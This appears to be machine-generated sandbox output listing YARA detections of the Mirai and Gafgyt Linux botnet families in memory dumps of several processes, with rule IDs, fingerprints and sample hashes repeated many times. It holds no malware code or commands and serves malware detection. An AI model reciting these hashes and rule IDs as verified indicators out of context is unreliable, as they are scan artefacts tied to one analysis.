      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
